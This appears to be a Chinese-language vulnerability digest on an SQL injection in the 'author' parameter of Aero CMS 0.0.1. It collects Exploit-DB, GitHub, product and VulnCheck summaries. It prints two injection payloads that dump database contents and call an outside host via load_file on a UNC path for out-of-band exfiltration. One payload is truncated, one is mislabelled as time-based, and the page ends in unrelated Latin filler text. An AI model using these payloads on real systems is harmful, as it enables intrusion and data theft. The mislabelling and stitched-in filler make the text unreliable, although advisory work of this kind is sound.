# Aero CMS 0.0.1 SQL注入漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Aero CMS v0.0.1 - SQLi - PHP webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
## 关键信息
- **漏洞名称:** Aero CMS v0.0.1 - SQLi
- **EDB-ID:** 51022
- **CVE:** N/A
- **作者:** nu11secur1ty
- **类型:** WEBAPPS
- **平台:** PHP
- **发布日期:** 2022-09-23
- **易受攻击的应用:** MegaTKC/AeroCMS v0.0.1
- **漏洞描述:** AeroCMS-v0.0.1 CMS系统中的`author`参数存在SQL注入漏洞,攻击者可以利用此漏洞转储数据库,进行各种恶意操作。
- **漏洞级别:** 高危
## Payload 示例
- **基于时间的盲注**
- **Payload:**
```sql
author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwlN'='mwLN&p_id=4
```
- **UNION查询**
- **Payload:**
```sql
author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d649434f644662587149734b6d517a4e674f5471615a73616d6f58,0x7170716b71),NULL,N...
```
## 参考链接
- Vendor: https://github.com/MegaTKC
- Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
- Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
标题: CVE-nu11secur1ty/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub -- 🔗来源链接
标签:technical-description
神龙速读:
### 关键信息
1. **漏洞描述**
- **漏洞**: AeroCMS-v0.0.1 存在SQL注入漏洞。
- **受影响参数**: `author` 参数(通过GET请求提交)。
- **POC (Proof of Concept)**:
- 一类 SQL 注入类型是布尔型盲注(将抛异常替换为报错返回值)。
- 更多其他类型利用样例亦存在,如 `author='admin'+…`.
2. **漏洞类型**
- **SQL注入漏洞**
- 存在多种绕过方式:如盲注、基于错误注入、时间延迟注入等。
- **风险等级**: 高危(恶意用户可以直接操作数据库)。
- **父组织**: 在`vendors`中,本漏洞针对的是AeroCMS制作的<a>其版本号是v0.0.1</a>。还有其他不同项目同时可结核例如`ANEJmmm`, `DHCP`等
- **安全影响**: 黑客可以利用该漏洞进行数据库信息窃取,造成数据泄露。
3. **修复/防御建议**
- 未直接列出。
- 可参考SQL注入一般防御手段:如输入参数过滤、使用预编译语句等。
4. **额外资源**
- [Reproduce](href)
- [Proof and Exploit](href)
标题: GitHub - MegaTKC/AeroCMS: Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications! -- 🔗来源链接
标签:product
神龙速读:
### 关键信息
- **项目主页**: 该截图来自GitHub,显示的是MegaTKC下名为AeroCMS的项目页面,表明这是一个开源的CMS(内容管理系统)项目。
- **项目更新**: 最后一次提交在截图中显示为10小时前,且最近的改动是“Add Discord Server Link”,由MegaTKC提交,这表明项目仍在维护中。
- **项目状态**: 该项目只有1个分支和1个标签,且尚未发布任何版本,这可能意味着项目处于早期开发阶段或维护更新不活跃。
- **项目语言**: AeroCMS主要使用JavaScript(67.4%)和PHP(30.9%)编写,使用了OOP PHP,这可能是对其安全性和功能扩展性的潜在风险点,因为如果编码不当,OOP PHP应用可能面临各类注入、权限提升等安全问题。
- **潜在风险**: 由于截图中没有显示项目的代码内容或安全措施的细节,仅凭此信息无法直接判断具体漏洞,但根据项目语言和技术栈,可以推测潜在的安全风险如XSS、SQL注入、 CSRF等,这些常见于web应用中,尤其是对于中小型CMS系统。
- **环境依赖**: 项目依赖于PHP 5.6 - PHP 7.4、MySQL或MariaDB数据库、Apache2服务器,这些信息对进行相关漏洞分析很有帮助,因为不同版本的PHP和数据库可能存在已知漏洞。同时,项目支持使用XAMPP服务器,这为快速搭建测试环境提供了便利,也意味着开发和测试过程中可能的配置不当和默认设置可能导致安全风险。
标题: Aero CMS 0.0.1 - SQL Injection | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
### 关键信息
- **漏洞名称:** Aero CMS 0.0.1 - SQL Injection
- **严重性:** HIGH
- **日期:** January 13, 2026
- **影响版本:** Aero CMS 0.0.1
- **CVE编号:** CVE-2022-50895
- **漏洞描述:** Aero CMS 0.0.1 在 `author` 参数中存在SQL注入漏洞,允许攻击者操纵数据库查询。攻击者可以利用布尔型、错误型、时间型和UNION查询技术来提取敏感的数据库信息,可能危及系统安全。
- **参考资料:**
- ExploitDB-51022
- Archived AeroCMS GitHub Repository
- Vulnerability Research Repository
- **提交者:** nu11secur1ty
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.